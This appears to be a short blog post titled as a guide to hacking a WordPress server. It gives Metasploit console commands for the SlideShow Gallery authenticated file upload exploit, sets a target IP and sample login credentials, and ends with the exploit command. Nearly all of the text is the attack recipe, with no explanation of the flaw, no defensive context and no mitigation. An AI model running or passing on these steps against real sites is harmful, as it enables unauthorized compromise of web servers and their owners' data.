Hack Wordpress Server using Wordpress SlideShow Gallery Authenticated File Upload


Exploit Targets
wordpress

Requirement
Attacker: kali Linux
Victim PC: Wordpress


Open Kali terminal type msfconsole


msf exploit (wp_slideshowgallery_upload)>set targeturi /
msf exploit (wp_slideshowgallery_upload)>set rhost 192.168.0.104 (IP of Remote Host)
msf exploit (wp_slideshowgallery_upload)>set wp_user user
msf exploit (wp_slideshowgallery_upload)>set wp_password bitnami
msf exploit (wp_slideshowgallery_upload)>exploit          

0 comments:

Post a Comment